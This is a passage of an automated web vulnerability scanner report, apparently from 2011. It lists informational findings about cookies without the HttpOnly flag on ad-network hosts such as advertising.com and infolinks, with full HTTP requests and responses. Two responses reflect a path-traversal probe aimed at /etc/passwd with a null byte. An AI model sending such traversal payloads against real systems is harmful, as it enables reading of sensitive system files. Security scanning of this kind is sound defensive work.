Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:03:37 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

12.149. http://r1-ads.ace.advertising.com/site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766159/size=300250/u=2/bnum=73177346/hr=1/hl=16/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fbostonherald.com%252Fincludes%252FprocessAds.bg%253Fposition%253DMiddle1%2526companion%253DTop%252CMiddle%252CMiddle1%252CBottom%2526page%253Dbh.heraldinteractive.com%25252Fnews%25252Fhome HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=51723131&rk1=19795551&rk2=1316239725.286&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1075460.766159.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:07:19 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:07:19 GMT
Content-Length: 1061
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 01:07:19 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

12.150. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=791296/size=300250/u=2/bnum=4256658/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tmz.com%252F2011%252F09%252F16%252Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%252F%253Fadid%253Dhero1 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?QGoAAJMQIwBQUEQAAAAAADwgEgAAAAAAAgAQAAIAAAAAAP8AAAAGFEz4GAAAAAAATvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB28HEx7NS8CmV5AsOiKv7-9qNiEv6o406fPd8cAAAAAA==,,http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1,Z%3D300x250%26_salt%3D1957428050%26anmember%3D514%26anprice%3D%26r%3D1%26s%3D2298003,fc95296e-e0c7-11e0-b013-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.576669.791296.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:57:17 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 373
Date: Sat, 17 Sep 2011 00:57:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:57:17 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<img src="http://bannerfarm.ace.advertising.com/bannerfarm/279/CSG_TWW_MKT_20080513_01 _photo_300x250.jpg" border="0">');document.write('');
var can_adInfoTag = {};
can_adInfoTag["77
...[SNIP]...

12.151. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1076845.791296.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:57:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 567
Date: Sat, 17 Sep 2011 00:57:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:57:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write("<SCRIPT language='JavaScript1.1' SRC='http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.3;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000791296
...[SNIP]...

12.152. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBZMQIwBWUEQAAAAAAEAgEgAAAAAAAgAAAAYAAAAAAP8AAAAGFEz4GAAAAAAAUvgYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1DhMAAAAAAAIAAgAAAAAAmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMCYyQztO8ClmeR2rwo8Ab3j-oNvoGtMiyJOdrAAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F221%2Ftmz%2F728x90%2Fhomepage_btf%3Ft%3D1316238825238,Z%3D728x90%26_salt%3D2029454794%26anmember%3D514%26anprice%3D%26fo%3D%26hp%3D0%26ht%3Djs%26hu%3D%26m%3D0%26r%3D0%26refer%3D%26s%3D2298003%26tz%3D300%26url%3Dhttp%253A%252F%252Fwww.tmz.com%252F,5257a1a2-e0c7-11e0-91e5-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1076846.804034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 00:52:38 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 566
Date: Sat, 17 Sep 2011 00:52:37 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Fri, 17-Sep-2021 00:52:38 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write("<SCRIPT language='JavaScript1.1' SRC='http://ad.doubleclick.net/adj/N5739.140101.AD.COM/B5822790.2;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000804034/
...[SNIP]...

12.153. http://receive.inplay.tubemogul.com/StreamReceiver/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /StreamReceiver/services

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /StreamReceiver/services HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
Content-Length: 1084
Origin: http://bostonherald.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: text/xml; charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517; _tmpd=MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA; _tmpi=MjAxMTA5MTE_MTk6LTU2NzU2MzM0MjE2OTk4NTc1MTc6Mjh8MjotNTY3NTYzMzQyMTY5OTg1NzUxNzoyOHwzOkUxOjI3fDY6LTU2NzU2MzM0MjE2OTk4NTc1MTc6MzB8OTotNTY3NTYzMzQyMTY5OTg1NzUxNzozMHwxNDotNTY3NTYzMzQyMTY5OTg1NzUxNzoyNw

<?xml version="1.0" encoding="utf-8"?><StreamMiner xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.illumenix.com/StreamReceiver/services/schemas streamminer.xsd" v
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: _tmpd="MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA../../../../../../../../etc/passwd%00MjAxMTA5MDg_ODpzZWdtZW50PTAwMCZ6aXA9JmFnZT0mZ2VuZGVyPTozMA"; Version=1; Domain=.tubemogul.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:47:56 GMT
Connection: close
Content-Length: 1113

<?xml version="1.0" encoding="UTF-8" standalone="no"?><StreamMiner xmlns="http://www.illumenix.com/StreamReceiver/services/schemas" version="2"><Response><PlayerSetupResponse playerInstanceID="at0MMG7
...[SNIP]...

12.154. http://rs.gwallet.com/r1/pixel/x420r2425801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r2425801

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r2425801 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Sun, 16-Sep-2012 01:11:49 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=37X1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sat, 17-Sep-2016 01:11:49 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

12.155. http://rt.legolas-media.com/lgrt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=53&pbi=36&ord=5642669 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fcolumnists%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgsp=eV/lKTwBeV98GzwB; lgpr=yVfKV85Xz1cWYNFXeV+kWKVYx1c=; lgtix=NQAPAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:52 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=NQAQAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB; path=/; expires=Tue, 16 Sep 2014 00:58:52 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 0
Connection: close


12.156. http://rt1302.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1302.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239041277.1 HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9824
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

makey=4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4f4e494b49464d51697f7277&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmi
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:13:40 GMT; Path=/
Set-Cookie: cnoi=299; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:13:40 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1596
Date: Sat, 17 Sep 2011 00:59:32 GMT
Connection: close

data=({rid:'da106062-18d8-449e-805a-c1785d15d58b',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec%00',sentences:{'make a move':{auth:{ssd:'-HV1HL9kugjkzUE9AaVYLNETMWONXG_mTmiDxu3QYm1C5j8_7XGRE9qJFNJdkoe8me
...[SNIP]...

12.157. http://rt1701.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1701.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238789823.1 HTTP/1.1
Host: rt1701.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 6888
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2D
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:55 GMT; Path=/
Set-Cookie: cnoi=3; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:05:55 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1112
Date: Sat, 17 Sep 2011 00:51:48 GMT

data=({rid:'d1ea2b56-5fdd-49db-8dab-4fcf1e95e552',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'reproduction':{auth:{ssd:'Dh0IZuL4IgYIqeirAlxEjAfn7Youo56Z8NKXdeEB69xyms4gVwXeja3NOcEJpGwlHvwF
...[SNIP]...

12.158. http://rt1702.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1702.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316239187592.1 HTTP/1.1
Host: rt1702.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 5152
Origin: http://www.toofab.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

by=f&jsv=222%2E0%2E4&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cbritney%20spears%20wears%20r
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:22:42 GMT; Path=/
Set-Cookie: cnoi=34; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:22:42 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1694
Date: Sat, 17 Sep 2011 01:08:35 GMT
Connection: close

data=({rid:'cca33222-1f55-4f3a-b220-79572031357e',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'partnership':{auth:{s
...[SNIP]...

12.159. http://rt1803.infolinks.com/action/doq.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt1803.infolinks.com
Path:   /action/doq.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /action/doq.htm?pcode=utf-8&r=1316238748131.1 HTTP/1.1
Host: rt1803.infolinks.com
Proxy-Connection: keep-alive
